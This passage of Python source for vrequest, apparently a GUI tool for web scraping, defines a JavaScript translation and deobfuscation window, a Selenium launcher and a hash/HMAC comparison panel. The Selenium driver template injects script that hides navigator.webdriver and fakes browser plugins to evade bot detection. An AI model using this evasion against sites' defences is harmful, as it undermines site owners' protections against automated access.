程序会自动不对该 dict 进行编码,POST 请求时请留意该功能
*(Alt + s) 生成 scrapy 请求代码,格式化结构同上
*(Alt + u) 生成 urllib 请求代码,格式化结构同上
响应窗口快捷键:
*(Alt + r) 打开一个空的响应标签(不建议在响应窗口使用)
(Alt + f) 智能解析列表路径,解析后使用 xpath 解析功能会自动弹出解析选择窗
(Alt + x) <代码过程> 使用 xpath 解析
(Alt + z) <代码过程> 智能提取 json 列表(由长到短顺序排列,不选默认第一条)
(Alt + q) <代码过程> 选择一个 json 列表
(Alt + d) <代码过程> 获取纯文字内容
(Alt + c) 生成请求代码,有<代码过程>则生成代码中包含过程代码
(Alt + s) 生成 scrapy 请求代码,有<代码过程>则生成代码中包含过程代码
(Alt + u) 生成 urllib 请求代码,不包含过程(解析过程必依赖lxml,与无依赖理念冲突)
(Esc) 开启/关闭 response 解析窗口
代码窗口快捷键:
(Alt + v) 代码执行 [在js代码窗同样适用]
(Esc) 开启/关闭 代码执行结果窗口 [在js代码窗同样适用]
scrapy 代码窗口快捷键:
(Alt + w) scrapy 代码执行
开源代码:
https://github.com/cilame/vrequest
赞助作者:
右键该窗口 -> “创建便捷加密编码窗口” -> “爆破;RSA;二维码” -> “赞助作者”
'''
temp_fr1 = Frame(fr,highlightthickness=lin)
def create_req_window(*a):
from .tab import create_new_reqtab
create_new_reqtab()
def creat_shortcut(*a):
from .tab import creat_windows_shortcut
creat_windows_shortcut()
def pip_install_allfunc(*a):
from .tab import pipinstall_all
pipinstall_all()
fr1 = Frame(fr)
fr1.pack()
btn = Button(fr1,text='创建请求窗口/[右键创建请求窗口]', command=create_req_window)
btn.pack(side=tkinter.LEFT)
btn = Button(fr1,text='创建桌面快捷方式', command=creat_shortcut)
btn.pack(side=tkinter.LEFT)
btn = Button(fr1,text='安装完整功能库', command=pip_install_allfunc)
btn.pack(side=tkinter.LEFT)
lb1 = ttk.Label(temp_fr1,font=ft,text=hp)
lb1.pack()
temp_fr1.pack()
return fr
def exec_js_window(setting=None):
'''
这里可能会使用两到三种js的加载方式,并且,js2py能生成 python 的代码,可能需要考虑生成python代码的功能
目前暂时没有完全实现
'''
fr = Frame()
ft = Font(family='Consolas',size=10)
# js代码转python代码
def translate_js_js2py():
jscode = txt1.get(0.,tkinter.END)
try:
import js2py
js2pycode = js2py.translate_js(jscode)
txt2.delete(0.,tkinter.END)
txt2.insert(0.,js2pycode)
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
def translate_js_python():
try:
from . import pysimplejs2python
except:
import pysimplejs2python
jscode = txt1.get(0.,tkinter.END)
try:
import jsbeautifier
jscode = txt1.get(0.,tkinter.END)
btjscode = jsbeautifier.beautify(jscode)
pycode = pysimplejs2python.simplejs2python(btjscode)
txt2.delete(0.,tkinter.END)
txt2.insert(0.,pycode)
except ImportError as e:
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
def get_script_from_tree(tree):
from .main import escodegen
if escodegen is None:
import js2py.py_node_modules.escodegen as escodegen
escodegen = escodegen.var.get('escodegen')
generate = escodegen.get('generate')
return generate(tree).to_python()
def make_js_tree():
try:
import pyjsparser
jscode = txt1.get(0.,tkinter.END)
tree = pyjsparser.parse(jscode)
txt2.delete(0.,tkinter.END)
txt2.insert(0.,json.dumps(tree, indent=4))
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
def defusion_js_code():
try:
try:
from .pyjsdefusion import get_node_ctx
except:
from pyjsdefusion import get_node_ctx
jscode = txt1.get(0.,tkinter.END)
ctx = get_node_ctx()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,ctx.call('muti_process_defusion', jscode))
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
def make_js_script():
from .tab import show_code_log
show_code_log()
try:
jstree = txt2.get(0.,tkinter.END)
script = get_script_from_tree(json.loads(jstree))
cd.delete(0.,tkinter.END)
cd.insert(0.,script)
except:
e = traceback.format_exc()
cd.delete(0.,tkinter.END)
cd.insert(0.,e)
def change_module(*a):
tp = cbx.get().strip()
btn_create_python_code['text'] = re.sub(r'\[[^\[\]+]*\]',tp,btn_create_python_code['text'])
def translate_js():
tp = cbx.get().strip()
jscode = txt1.get(0.,tkinter.END)
if 'execjs' in tp:
pythoncode = """
#coding=utf-8
jscode = r'''
$^^$jscode$^^$
'''
import execjs
ctx = execjs.compile(jscode)
result = ctx.call('func',10,20) # 执行函数,需要传参函数将参从第二个开始依次排在方法名后面
# result = ctx.eval('func(22,33)')
print(result)
""".replace('$^^$jscode$^^$', jscode.strip()).strip()
if 'js2py' in tp:
pythoncode = """
#coding=utf-8
jscode = r'''
$^^$jscode$^^$
'''
import js2py
# js = js2py.eval_js(jscode)
# 这里的 js 是代码执行后最后一个 var 赋值的参数返回出来。
# print(js) # 这种模式有弊端,每次都要解析一遍。
# 请尽量使用下面的方式,这样可以直接用 . 调用内部函数或参数
js = js2py.EvalJs()
js.execute(jscode)
print(js.a)
print(js.func)
""".replace('$^^$jscode$^^$', jscode.strip()).strip()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,pythoncode)
import queue
Q = queue.Queue()
S = queue.Queue()
def exec_javascript(*a):
def _temp():
__very_unique_cd__ = None
nonlocal cd
nonlocal Q, S
Q.put('V|GETSCRIPT')
cs = S.get()
td = tempfile.mkdtemp()
tf = os.path.join(td,'temp.py')
with open(tf,'w',encoding='utf-8') as f:
f.write(cs)
s = sys.executable
s = s + ' ' + tf
import subprocess
p = subprocess.Popen(s, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, encoding='utf-8')
Q.put('V|DELETE')
Q.put('============================== start ==============================\n')
for line in iter(p.stdout.readline, ''):
if line:
Q.put(line)
else:
break
Q.put('============================== end ==============================')
p.wait()
p.stdout.close()
shutil.rmtree(td)
threading.Thread(target=_temp).start()
def loop_in_tkinter():
__very_unique_cd__ = None
nonlocal cd, Q, S
from .tab import nb
c = []
while Q.qsize():
try:
i = Q.get_nowait()
if i == 'V|DELETE':
cd.delete(0., tkinter.END)
elif i == 'V|GETSCRIPT':
cs = txt2.get(0.,tkinter.END)
S.put(cs)
else:
try:
cd.insert(tkinter.END, i)
except:
cd.insert(tkinter.END, re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',i))
cd.see(tkinter.END)
cd.update()
except:
import traceback
tkinter.messagebox.showinfo('Error',traceback.format_exc())
nb.after(200, loop_in_tkinter)
loop_in_tkinter()
def _exec_javascript(*a):
from .tab import show_code_log
show_code_log()
exec_javascript()
def js_beautify(*a):
try:
import jsbeautifier
jscode = txt1.get(0.,tkinter.END)
btjscode = jsbeautifier.beautify(jscode)
txt1.delete(0.,tkinter.END)
txt1.insert(0.,btjscode)
except ImportError as e:
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
except:
einfo = traceback.format_exc() + \
'\n\njs代码美化在一些极端的 eval 函数美化时会出现一些问题' + \
'\n所以出现错误时可以考虑检查代码的 eval 函数的处理'
txt2.delete(0.,tkinter.END)
txt2.insert(0.,einfo)
def save_script_in_desktop(*a):
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。')
if not name: return
if not name.endswith('.py'): name += '.py'
desktop_script = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
f.write(txt2.get(0.,tkinter.END))
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
# 查看常用的js解析器的引入状态
support_modules = ['js2py', 'execjs']
def get_js_import_stat(support_modules):
s = []
def _temp(module):
try:
__import__(module)
s.append('+ Enable Use [{}] js driver.'.format(module))
except:
s.append('- Unable Use [{}] js driver.'.format(module))
for module in support_modules:
_temp(module)
return s
import_stat = get_js_import_stat(support_modules)
temp_fr0 = Frame(fr)
temp_fr0.pack(fill=tkinter.X)
import_modules = [i[i.find('['):i.rfind(']')+1] for i in import_stat if i.startswith('+')]
if not import_modules:
einfo = 'unfind any of {} module.'.format(support_modules)
tkinter.messagebox.showinfo('Error',einfo)
raise EnvironmentError(einfo)
cbx = Combobox(temp_fr0,width=13,state='readonly')
cbx['values'] = import_modules
cbx.current(0)
cbx.pack(fill=tkinter.X,side=tkinter.LEFT)
cbx.bind('<<ComboboxSelected>>', change_module)
btn_js_beautify = Button(temp_fr0,text='js代码美化',command=js_beautify)
btn_js_beautify.pack(side=tkinter.LEFT)
btn_create_python_code = Button(temp_fr0,text='生成python[]代码 [Alt+c]',command=translate_js)
btn_create_python_code.pack(side=tkinter.LEFT)
btn_translate_js = Button(temp_fr0,text='翻译成[js2py]代码',command=translate_js_js2py)
btn_translate_js.pack(side=tkinter.LEFT)
btn_translate_js2python = Button(temp_fr0,text='简单js代码翻译成[python]代码(可能有错误)',command=translate_js_python)
btn_translate_js2python.pack(side=tkinter.LEFT)
btn2 = Button(temp_fr0, text='[执行代码] <Alt+v>', command=_exec_javascript)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='保存脚本到桌面', command=save_script_in_desktop)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='用语法树生成代码', command=make_js_script)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='生成语法树', command=make_js_tree)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='使用node简单逆混肴代码', command=defusion_js_code)
btn2.pack(side=tkinter.RIGHT)
temp_fr0 = Frame(fr)
temp_fr0.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr1 = Frame(temp_fr0)
temp_fr1_1 = Frame(temp_fr1)
temp_fr1_1.pack(side=tkinter.TOP)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
txt1 = Text(temp_fr1,height=1,width=1,font=ft)
lab1 = Label(temp_fr1_1,text='js代码')
lab1.pack(side=tkinter.TOP)
txt1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr2 = Frame(temp_fr0)
temp_fr2_1 = Frame(temp_fr2)
temp_fr2_1.pack(fill=tkinter.X,side=tkinter.TOP)
temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.RIGHT)
lab1 = Label(temp_fr2_1,text='python代码')
lab1.pack(side=tkinter.TOP)
txt2 = Text(temp_fr2,height=1,width=1,font=ft)
txt2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr3 = Frame(fr)
lab3 = Label(temp_fr3, text='代码结果 [Esc 切换显示状态]')
lab3.pack(side=tkinter.TOP)
cd = Text(temp_fr3,font=ft)
cd.pack(fill=tkinter.BOTH,expand=True)
test_code = '''
// test_code
function func(a,b){
return a+b
}
var a = func(1,3);
'''.strip()
txt1.insert(0.,test_code)
change_module()
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(txt2).insertfilter(p) # txt2 是js2py生成的python代码,需要填色
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'js'
frame_setting[fr]['execute_func0'] = translate_js
frame_setting[fr]['execute_func1'] = translate_js_js2py
frame_setting[fr]['execute_func'] = exec_javascript
frame_setting[fr]['import_stat'] = import_stat
frame_setting[fr]['fr_temp2'] = temp_fr3 # 代码执行框,这里仍需挂钩esc按键显示/关闭该窗口
return fr
def selenium_test_window(setting=None):
'''
快速使用临时的 selenium 启动浏览器并且快速将某些操作自动化处理
'''
fr = Frame()
ft = Font(family='Consolas',size=10)
def print(*a):
from .tab import show_code_log
try:
show_code_log()
txt = ' '.join(map(str,a)) + '\n'
cd.insert(tkinter.END,re.sub('[\uD800-\uDBFF][\uDC00-\uDFFF]|[\U00010000-\U0010ffff]','',txt))
cd.see(tkinter.END)
cd.update()
except:
pass
temp_fr0 = Frame(fr)
temp_fr0.pack(fill=tkinter.X)
def get_webdriver():
local = {'get_driver_func':None}
exec(txt2.get(0.,tkinter.END)+'\nlocal["get_driver_func"] = get_driver', None, {'local':local})
get_driver_func = local['get_driver_func']
return get_driver_func()
driver = None
def start_selenium(*a):
nonlocal driver
def _():
nonlocal driver
if driver is None:
print('预备启动,请等待获取 driver 对象。')
driver = 'None' # 启动浏览器为耗时操作,这里用了多线程,所以要防启动间隙多次启动
try:
import subprocess
_bak_Popen = subprocess.Popen
def _Popen(*a, **kw):
kw['creationflags'] = 0x08000000
return _bak_Popen(*a, **kw)
subprocess.Popen = _Popen
driver = get_webdriver()
print('启动成功,可以在代码窗使用 driver 对象代码。')
except:
print(traceback.format_exc())
finally:
subprocess.Popen = _bak_Popen
else:
tkinter.messagebox.showwarning('警告','浏览器driver已启动,如需重启,先关闭。')
threading.Thread(target=_).start()
def close_selenium(*a):
nonlocal driver
def _():
nonlocal driver
if driver is not None and driver != 'None':
_driver = driver
try:
try: print('正在关闭,请等待片刻。')
except: pass
driver = 'None'
_driver.quit()
driver = None
print('关闭成功,代码窗口将不能使用 driver 对象。')
except:
print(traceback.format_exc())
elif driver == 'None':
clear_selenium_driver()
else:
print('警告','不存在已启动的浏览器')
threading.Thread(target=_).start()
def clear_selenium_driver(*a):
nonlocal driver
os.popen('taskkill /f /im chromedriver.exe /t')
driver = None
def execute_selenium_code(*a):
nonlocal print, driver
code = txt1.get(0., tkinter.END)
local = {'print':print, 'driver':driver}
try:
exec(code, None, local)
except:
print(traceback.format_exc())
def save_script_in_desktop(*a):
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。')
if not name: return
if not name.endswith('.py'): name += '.py'
desktop_script = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
script = txt2.get(0.,tkinter.END) + '\ndriver = get_driver()\n'
script += txt1.get(0.,tkinter.END) + '\ndriver.quit()'
f.write(script)
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
def add_script(*a):
if '常见用法,某些窗口输入内容,并点击提交' not in txt1.get(0., tkinter.END):
txt1.insert(tkinter.END, '''
# 常见用法,请求某个网页,在某个输入框输入内容,点击提交按钮
driver.get('http://baidu.com')
driver.find_element_by_xpath('//*[@id="kw"]').clear()
driver.find_element_by_xpath('//*[@id="kw"]').send_keys('123123')
driver.find_element_by_xpath('//*[@id="su"]').click()
# driver.find_element_by_xpath('//*[@id="su"]').get_attribute() # 获取属性
# 常用获取组件方式
# 1 find_element_* 直接获取组件对象,如果获取不到直接报错
# driver.find_element_by_id
# driver.find_element_by_name
# driver.find_element_by_xpath
# 2 find_elements_* 获取组件列表对象,如果获取不到不会报错,只会返回空
# driver.find_elements_by_id
# driver.find_elements_by_name
# driver.find_elements_by_xpath
# 获取 window 桌面绝对路径的代码,用于快速保存数据到可见位置
# desktop = os.path.join(os.path.expanduser("~"),'Desktop')
# 部分智能等待的代码,提高浏览器效率的处理,最好在生成的单独脚本中使用
# from selenium.webdriver.common.by import By
# from selenium.webdriver.support import expected_conditions as EC
# from selenium.webdriver.support.wait import WebDriverWait as wbw
# locator = (By.XPATH, '//img[@class="focus-item-img"]')
# # wbw(self.webdriver,10).until(EC.presence_of_element_located(locator)) # 判断某个元素是否被加到了dom树里
# wbw(self.webdriver,10).until(EC.visibility_of_element_located(locator)) # 判断某个元素是否被添加到了dom里并且可见,即宽和高都大于0
# 当你打包脚本时,在 get_driver 函数执行前执行以下代码,打包的后的工具就不会因为 selenium启动服务自动开启黑窗口了
# import subprocess
# _bak_Popen = subprocess.Popen
# def _Popen(*a, **kw):
# kw['creationflags'] = 0x08000000
# return _bak_Popen(*a, **kw)
# subprocess.Popen = _Popen
''')
btn2 = Button(temp_fr0, text='保存脚本到桌面', command=save_script_in_desktop)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='[执行代码] <Alt+v>', command=execute_selenium_code)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='启动浏览器driver <Alt+c>', command=start_selenium)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='关闭浏览器driver', command=close_selenium)
btn2.pack(side=tkinter.RIGHT)
btn2 = Button(temp_fr0, text='执行代码模板', command=add_script)
btn2.pack(side=tkinter.RIGHT)
temp_fr0 = Frame(fr)
temp_fr0.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr1 = Frame(temp_fr0)
temp_fr1_1 = Frame(temp_fr1)
temp_fr1_1.pack(side=tkinter.TOP)
temp_fr1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.LEFT)
txt1 = Text(temp_fr1,height=1,width=1,font=ft)
lab1 = Label(temp_fr1_1,text='可执行 python 代码')
lab1.pack(side=tkinter.TOP)
txt1.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
temp_fr2 = Frame(temp_fr0)
temp_fr2_1 = Frame(temp_fr2)
temp_fr2_1.pack(fill=tkinter.X,side=tkinter.TOP)
temp_fr2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.RIGHT)
lab1 = Label(temp_fr2_1,text='启动 driver 的 python 代码')
lab1.pack(side=tkinter.TOP)
txt2 = Text(temp_fr2,height=1,width=1,font=ft)
txt2.pack(fill=tkinter.BOTH,expand=True,side=tkinter.TOP)
txt1.insert(tkinter.END, '''
print(driver)
'''.strip())
txt2.insert(tkinter.END, '''
def get_driver():
from selenium import webdriver
option = webdriver.ChromeOptions()
extset = ['enable-automation', 'ignore-certificate-errors']
ignimg = "profile.managed_default_content_settings.images"
mobile = {'deviceName':'Galaxy S5'}
# 需要哪些 driver 功能,请解开对应的代码注释再启动
option.add_argument("--disable-infobars") # 关闭调试信息
option.add_experimental_option("excludeSwitches", extset) # 关闭调试信息
option.add_experimental_option("useAutomationExtension", False) # 关闭调试信息
option.add_argument('--start-maximized') # 最大化
# option.add_experimental_option('mobileEmulation', mobile) # 手机模式
# option.add_experimental_option("prefs", {ignore_image: 2}) # 不加载图片
# option.add_argument('--headless') # 【*】 无界面
# option.add_argument('--no-sandbox') # 【*】 沙箱模式
# option.add_argument('--disable-dev-shm-usage') # 【*】 in linux
# option.add_argument('--window-size=1920,1080') # 无界面最大化
# option.add_argument('--disable-gpu') # 禁用 gpu 加速
# option.add_argument("--auto-open-devtools-for-tabs") # F12
# option.add_argument("--user-agent=Mozilla/5.0 VILAME") # 修改 UA
# option.add_argument('--proxy-server=http://127.0.0.1:8888') # 代理
webdriver = webdriver.Chrome(chrome_options=option)
# 指纹相关的处理,能处理部分检测。
webdriver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {
"source": """
Object.defineProperty(navigator, 'webdriver', { get: () => undefined });
Object.defineProperty(navigator, "plugins", { get: () => [1,2,3,4,5] });
"""
})
webdriver.execute_cdp_cmd("Network.enable", {})
return webdriver
'''.strip())
temp_fr3 = Frame(fr)
lab3 = Label(temp_fr3, text='代码结果 [Esc 切换显示状态]')
lab3.pack(side=tkinter.TOP)
cd = Text(temp_fr3,font=ft)
cd.pack(fill=tkinter.BOTH,expand=True)
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(txt1).insertfilter(p)
except:
e = traceback.format_exc()
txt1.delete(0.,tkinter.END)
txt1.insert(0.,e)
try:
from idlelib.colorizer import ColorDelegator
from idlelib.percolator import Percolator
p = ColorDelegator()
Percolator(txt2).insertfilter(p)
except:
e = traceback.format_exc()
txt2.delete(0.,tkinter.END)
txt2.insert(0.,e)
# 确保强制退出时能关闭 webdriver 进程,防止幽灵进程
from .root import tails
tails.append(clear_selenium_driver)
frame_setting[fr] = {}
frame_setting[fr]['type'] = 'selenium'
frame_setting[fr]['execute_func'] = execute_selenium_code
frame_setting[fr]['start_selenium'] = start_selenium
frame_setting[fr]['fr_temp2'] = temp_fr3 # 代码执行框,这里仍需挂钩esc按键显示/关闭该窗口
return fr
def encode_window(setting=None):
'''
处理简单的加密编码对比
'''
fr = tkinter.Toplevel()
fr.title('命令行输入 ee 则可快速打开便捷加密窗口(为防冲突,输入vv e也可以打开), 组合快捷键 Alt+` 快速打开IDLE')
fr.resizable(False, False)
try:
try:
from .tab import create_temp_idle
except:
from tab import create_temp_idle
fr.bind('<Alt-`>',lambda *a:create_temp_idle())
except:
pass
enb = ttk.Notebook(fr)
enb_names = {}
_fr = Frame(fr)
enb.add(_fr, text='hash')
enb.pack()
enb_names[_fr._name] = 'hash'
f0 = Frame(_fr)
f0.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
f0_ = Frame(_fr)
f0_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
f1 = Frame(f0)
f2 = Frame(f0)
f1.pack(fill=tkinter.BOTH,expand=True)
f2.pack(fill=tkinter.BOTH,expand=True)
algorithms = hashlib.algorithms_available
algorithms.add('md2')
try:
from . import pymd2
except:
import pymd2
ipadx = 0
ipady = 0
padx = 1
pady = 1
width = 60
sticky = 'NESW'
ft = Font(family='Consolas',size=10)
crow = 0
ls = []
di = {}
dh = {}
allow = [
'blake2b',
'blake2s',
'md2',
'md4',
'md5',
'ripemd160',
'sha',
'sha1',
'sha224',
'sha256',
'sha384',
'sha3_224',
'sha3_256',
'sha3_384',
'sha3_512',
'sha512',
'whirlpool'
]
for idx,name in enumerate(sorted(algorithms)+sorted(algorithms)):
if name in allow and idx < len(algorithms):
if name == 'md2':
hlen = 32
else:
hlen = len(hmac.new(b'',b'',name).hexdigest())
l,e = Label(f2,text='[*]'+name+'[len:{}]'.format(str(hlen)),font=ft),Entry(f2,width=width,font=ft)
dh[name] = e
l.grid(row=idx,column=0,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
e.grid(row=idx,column=1,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
if name in allow and idx >= len(algorithms):
if name == 'md2':
continue
else:
hlen = len(hmac.new(b'',b'',name).hexdigest())
l,e = Label(f2,text='[hmac]'+name+'[len:{}]'.format(str(hlen)),font=ft),Entry(f2,width=width,font=ft)
di[name] = e
l.grid(row=idx,column=0,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
e.grid(row=idx,column=1,ipadx=ipadx,ipady=ipady,padx=padx,pady=pady,sticky=sticky)
def func(*a):
def _show(*a, stat='show'):
try:
if stat == 'show': ss.pack(side=tkinter.LEFT)
if stat == 'hide': ss.pack_forget()
except:
pass
_show(stat='show') if va.get() else _show(stat='hide')
f11 = Frame(f1)
f11.pack(fill=tkinter.X)
def _switch_case(*a):
for name,ge in di.items():
try:
v = ge.get().upper() if ca.get() else ge.get().lower()
ge.delete(0,tkinter.END)
ge.insert(0,v)
except:
import traceback; traceback.print_exc()
print('error',name)
for name,ge in dh.items():
try:
v = ge.get().upper() if ca.get() else ge.get().lower()
ge.delete(0,tkinter.END)
ge.insert(0,v)
except:
import traceback; traceback.print_exc()
print('error',name)
def _swich_encd(*a):
s = en.get().strip()
if s == 'utf-8':
en.delete(0,tkinter.END)
en.insert(0,'gbk')
elif s == 'gbk':
en.delete(0,tkinter.END)
en.insert(0,'utf-8')
else:
en.delete(0,tkinter.END)
en.insert(0,'utf-8')
ca = tkinter.IntVar()
rb = Checkbutton(f11,text='hash编码是否大写',variable=ca,command=_switch_case)
rb.pack(side=tkinter.RIGHT)
rb.deselect()
en = Entry(f11, width=6, font=ft)
en.insert(0,'utf-8')
en.pack(side=tkinter.RIGHT)
Button(f11,text='编码方式',command=_swich_encd).pack(side=tkinter.RIGHT,padx=2)
ss = Entry(f11)
va = tkinter.IntVar()
rb = Checkbutton(f11,text='添加密盐参数',variable=va,command=func)
rb.pack(side=tkinter.LEFT,padx=10)
Label(f1,text='加密或编解码文本').pack(side=tkinter.LEFT,padx=10)
ee = Entry(f1)
ee.pack(side=tkinter.LEFT)
def _encode_all(*a):
encd = en.get().strip()
salt = ss.get().encode(encd) if va.get() else b''
text = ee.get().encode(encd)
for name,ge in di.items():
try:
# if name == 'md2': name = pymd2.md2
v = hmac.new(salt,text,name).hexdigest()
v = v.upper() if ca.get() else v.lower()
ge.delete(0,tkinter.END)
ge.insert(0,v)
except:
import traceback; traceback.print_exc()
print('error',name)
def _encode_hash(*a):
encd = en.get().strip()
salt = ss.get().encode(encd) if va.get() else b''
text = ee.get().encode(encd)
for name,ge in dh.items():
try:
if name == 'md2':
v = pymd2.md2(text)
else:
v = hashlib.new(name,text).hexdigest()
v = v.upper() if ca.get() else v.lower()
ge.delete(0,tkinter.END)
ge.insert(0,v)
except:
import traceback; traceback.print_exc()
print('error',name)
Button(f1, text='hmac',command=_encode_all,width=5).pack(side=tkinter.RIGHT)
Button(f1, text='hash',command=_encode_hash,width=5).pack(side=tkinter.RIGHT)
f1_ = Frame(f0_)
f1_.pack(fill=tkinter.BOTH)
f2_ = Frame(f0_)
f2_.pack(fill=tkinter.BOTH,expand=True)
lb_ = Label(f1_,text='compare(对比字符串)')
lb_.pack(side=tkinter.LEFT,padx=10,pady=pady)
et_ = Entry(f1_,width=30)
et_.pack(side=tkinter.LEFT,padx=padx,pady=pady)
import difflib
def _diff_log(a, b):
d = difflib.Differ()
s = d.compare(a.splitlines(), b.splitlines())
for i in s:
print(i)
def print(*a, end='\n'):
# import pprint
# pprint.pprint(enb_names)
name = enb.select().rsplit('.')[-1]
if enb_names[name] == 'hash':
txt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '算法加解密':
ftxt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '依赖库加解密':
ctxt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '通用解密':
bbtxt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '爆破;RSA;二维码':
fsstxt.insert(tkinter.END,' '.join(map(str,a)) + end)
elif enb_names[name] == '图片相关':
fpictxt.insert(tkinter.END,' '.join(map(str,a)) + end)
fpictxt.update()
def _analysis_diff(*a):
txt.delete(0.,tkinter.END)
it = []
for name,ge in list(dh.items()):
try:
a, b = et_.get(), ge.get()
s = difflib.SequenceMatcher(None, a.upper(), b.upper())
q = s.find_longest_match(0, len(a), 0, len(b))
if q.size>0:
it.append([name, a, b, q.size])
except:
import traceback; traceback.print_exc()
print('error',name)
for name,ge in list(di.items()):
try:
a, b = et_.get(), ge.get()
s = difflib.SequenceMatcher(None, a.upper(), b.upper())
q = s.find_longest_match(0, len(a), 0, len(b))
if q.size>0:
it.append(['[hmac]'+name, a, b, q.size])
except:
import traceback; traceback.print_exc()
print('error',name)
cnt = 0
for name,a,b,max_match in sorted(it,key=lambda max_match:-max_match[3])[:5]:
cnt += 1
s = difflib.SequenceMatcher(None, a.upper(), b.upper())
print('max_match_len:{}'.format(max_match))
print('len[compare]:{}'.format(len(a), ))
print('len[{}]:{}'.format(name, len(b)))
matchcnt = 0
for match in sorted(s.get_matching_blocks(),key=lambda i:-i.size):
if match.size:
v = a[match.a:match.a+match.size]
matchcnt += match.size
print(' [match.size:{}] {}'.format(match.size, v))
print(' [match.count:{}]'.format(matchcnt))
print('---------------')
if not cnt:
print('not match.')
def _creat_code(*a):
import pprint
txt.delete(0.,tkinter.END)
salt = ss.get().strip() if va.get() else ''
text = ee.get().strip()
compare_str = et_.get().strip()
code = '''
import hmac
import hashlib
# md2 算法
def _hash(message, printdebug=False):
assert isinstance(message, list)
msg = list(message)
if printdebug: print("md2.hash(message = {} bytes)".format(len(message)))
padlen = _BLOCK_SIZE - (len(msg) % _BLOCK_SIZE)
msg.extend([padlen] * padlen)
state = tuple([0] * 48)
checksum = tuple([0] * 16)
assert len(msg) % _BLOCK_SIZE == 0
for i in range(len(msg) // _BLOCK_SIZE):
block = tuple(msg[i * _BLOCK_SIZE : (i + 1) * _BLOCK_SIZE])
state, checksum = _compress(block, state, checksum, printdebug)
state, checksum = _compress(checksum, state, checksum, printdebug)
return list(state[ : 16])
def _compress(block, state, checksum, printdebug):
assert isinstance(block, tuple) and len(block) == _BLOCK_SIZE
assert isinstance(state, tuple) and len(state) == 48
assert isinstance(checksum, tuple) and len(checksum) == 16
newstate = list(state)
for i in range(16):
b = block[i]
assert 0 <= b <= 0xFF
newstate[i + 16] = b
newstate[i + 32] = b ^ newstate[i]
t = 0
for i in range(18):
for j in range(len(newstate)):
newstate[j] ^= _SBOX[t]
t = newstate[j]
t = (t + i) & 0xFF
newchecksum = list(checksum)
l = newchecksum[-1]
for i in range(16):
l = newchecksum[i] ^ _SBOX[block[i] ^ l]
newchecksum[i] = l
return (tuple(newstate), tuple(newchecksum))
_BLOCK_SIZE = 16 # In bytes
_SBOX = [ # A permutation of the 256 byte values, from 0x00 to 0xFF
0x29, 0x2E, 0x43, 0xC9, 0xA2, 0xD8, 0x7C, 0x01, 0x3D, 0x36, 0x54, 0xA1, 0xEC, 0xF0, 0x06, 0x13,
0x62, 0xA7, 0x05, 0xF3, 0xC0, 0xC7, 0x73, 0x8C, 0x98, 0x93, 0x2B, 0xD9, 0xBC, 0x4C, 0x82, 0xCA,
0x1E, 0x9B, 0x57, 0x3C, 0xFD, 0xD4, 0xE0, 0x16, 0x67, 0x42, 0x6F, 0x18, 0x8A, 0x17, 0xE5, 0x12,
0xBE, 0x4E, 0xC4, 0xD6, 0xDA, 0x9E, 0xDE, 0x49, 0xA0, 0xFB, 0xF5, 0x8E, 0xBB, 0x2F, 0xEE, 0x7A,
